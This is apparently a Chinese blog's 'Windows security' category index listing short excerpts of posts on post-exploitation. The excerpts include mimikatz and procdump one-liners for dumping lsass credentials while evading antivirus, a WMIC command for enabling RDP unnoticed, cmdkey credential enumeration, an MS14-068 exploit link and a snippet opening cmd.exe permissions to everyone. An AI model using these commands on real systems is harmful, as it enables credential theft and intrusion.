随笔分类 - windows
windows安全
摘要:压缩一个文件:makecab c:\ls.exe ls.zip解压一个文件:expand c:\ls.zip c:\ls.exe
阅读全文
摘要:有些时候无法反弹shell执行mimikatz,虽然可以用procdump导出lsass的内存dump文件,之后本地获取明文密码,但多少有点麻烦,其实mimikatz也支持命令行直接导出mimikatz.exe privilege::debug "log filename.log" sekurlsa...
阅读全文
摘要:try{var strPath:String = "c:\\windows\\temp\\cmd.exe", strUser:String = "everyone";var dirinfo:System.IO.DirectoryInfo = new System.IO.DirectoryInfo(s...
阅读全文
摘要:https://github.com/bidord/pykek ms14-068.pyExploits MS14-680 vulnerability on an un-patched domain controler of an Active Directory domain to get a K...
阅读全文
摘要:如果您运行的是 64 位 Windows,请从 %windir%\system32\inetsrv 目录而不是 %windir%\syswow64\inetsrv 目录中使用 Appcmd.exe。 C:\Windows\System32\inetsrv>appcmd list VDIR VDIR
阅读全文
摘要:Dim ss = InputBox("当前Windows系统序列号为:", "Windows序列号", GetWindowsSN)WScript.Quit'取得当前Windows序列号函数Function GetWindowsSN() Const HKEY_LOCAL_MACHINE = &H...
阅读全文
摘要:网上流传了很多开3389的exe小工具,还有读写注册表的bat批处理,有的是操作注册表,有的是操作各种组件这里提供一个不会被拦截,而且可以使用的开3389的cmd一句话:wmicRDTOGGLEWHEREServerName='%COMPUTERNAME%'callSetAllowTSConnect...
阅读全文
摘要:cmdkey /list可以列出域内网之间可用的凭据。wmic useraccount get name,sidgpresult /r
阅读全文
摘要:这个0day的发现挺有意思的,是老外CrowdStrike 发现的,被老外监测程序发现显示从WEBSHELL使用Win64.exe来提升权限。原文地址:http://blog.crowdstrike.com/crowdstrike-discovers-use-64-bit-zero-day-priv...
阅读全文
摘要:使用procdump,由于是微软的东西,带微软签名杀软不会报毒。procdump -accepteula -ma lsass.exe lsass.dmpcopy出 lsass.dmp到本机。mimikatz # sekurlsa::minidump lsass.dmpSwitch to MINIDUMPmimikatz # sekurlsa::logonPasswords具体可以参考原文:http://blog.gentilkiwi.com/securite/mimikatz/minidump
阅读全文


浙公网安备 33010602011771号